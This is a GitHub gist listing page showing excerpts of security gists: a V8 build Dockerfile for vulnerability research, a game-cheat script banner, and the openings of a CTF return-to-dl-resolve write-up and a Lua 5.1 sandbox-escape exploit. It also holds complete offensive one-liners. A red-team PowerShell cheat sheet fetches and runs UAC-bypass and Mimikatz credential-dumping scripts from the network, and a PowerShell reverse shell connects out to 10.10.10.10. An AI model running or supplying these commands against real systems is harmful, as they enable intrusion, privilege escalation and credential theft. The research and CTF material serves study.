Skip to content

Instantly share code, notes, and snippets.

View A1-exe's full-sized avatar
🕵️‍♂️

Morse A1-exe

🕵️‍♂️
8 followers · 22 following
View GitHub Profile
@alisaesage
alisaesage / Dockerfile
Created June 20, 2023 12:35
Build v8 x64 on modern Linux
# Build v8 x64 on modern Linux
# Time to run: about 1.2hrs at 8Gb RAM / 8 cores, Ubuntu 22.04 LTS
# This dockerfile is part of Zero Day Engineering training materials on JavaScript engines internals and vulnerability research
# https://zerodayengineering.com
# @zerodaytraining
FROM ubuntu:bionic
MAINTAINER contact@zerodayengineering.com
RUN apt-get update && apt-get upgrade
@A1-exe
A1-exe / [LATEST] A1_exe's FPS Hacks v4.5.3.lua
Last active November 3, 2021 21:56
latest first person shooter stuff
--[[
__/\\\\____________/\\\\_________________________________________________________
_\/\\\\\\________/\\\\\\_________________________________________________________
_\/\\\//\\\____/\\\//\\\_________________________________________________________
_\/\\\\///\\\/\\\/_\/\\\_____/\\\\\_____/\\/\\\\\\\___/\\\\\\\\\\_____/\\\\\\\\__
_\/\\\__\///\\\/___\/\\\___/\\\///\\\__\/\\\/////\\\_\/\\\//////____/\\\/////\\\_
_\/\\\____\///_____\/\\\__/\\\__\//\\\_\/\\\___\///__\/\\\\\\\\\\__/\\\\\\\\\\\__
_\/\\\_____________\/\\\_\//\\\__/\\\__\/\\\_________\////////\\\_\//\\///////___
_\/\\\_____________\/\\\__\///\\\\\/___\/\\\__________/\\\\\\\\\\__\//\\\\\\\\\\_
@jivoi
jivoi / RedTeam_CheatSheet.ps1
Created July 14, 2018 14:52 — forked from m8sec/RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@ricardo2197
ricardo2197 / return to dl-resolve.md
Last active March 1, 2024 19:31
Return-to dl-resolve

0ctf babystack with return-to dl-resolve

In this write-up I will discuss how I managed to solve the challenge "babystack" from 0ctf with a technique called return to dl-resolve. I did not know this kind of return-to attack before the contest. In the following sections a detailed explanation of the entire exploit will be presented.

1. Binary analysis

I downloaded the provided binary babystack and quickly fired up binaryninja alongside with gdb to analyze it. I quickly realized a buffer overflow vulnerability is present within sub_804843b. My first approach was to solve this challenge using a return-to-libc attack by leaking the base address of the library and call system in order to get a shell.
This technique is contingent on:

  1. Leaking libc base address
  2. Knowing the version of libc to get the offset of system.

However, the version of libc on the remote server was unknown and the ELF did not provide any function that can be us

@egre55
egre55 / powershell_reverse_shell.ps1
Last active May 30, 2024 13:04
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@zhujunsan
zhujunsan / Using Github Deploy Key.md
Last active June 4, 2024 10:08
Using Github Deploy Key

What / Why

Deploy key is a SSH key set in your repo to grant client read-only (as well as r/w, if you want) access to your repo.

As the name says, its primary function is to be used in the deploy process in replace of username/password, where only read access is needed. Therefore keep the repo safe from the attack, in case the server side is fallen.

How to

  1. Generate a ssh key
@corsix
corsix / Exploiting Lua 5.1 on 32-bit Windows.md
Created September 16, 2013 00:20

Exploiting Lua 5.1 on 32-bit Windows

The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of relevent bits of the Lua 5.1 virtual machine.

if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
  error("This generator requires a 32-bit version of Lua 5.1")
end

local function outer()
  local magic -- In bytecode, the stack slot corresponding to this local is changed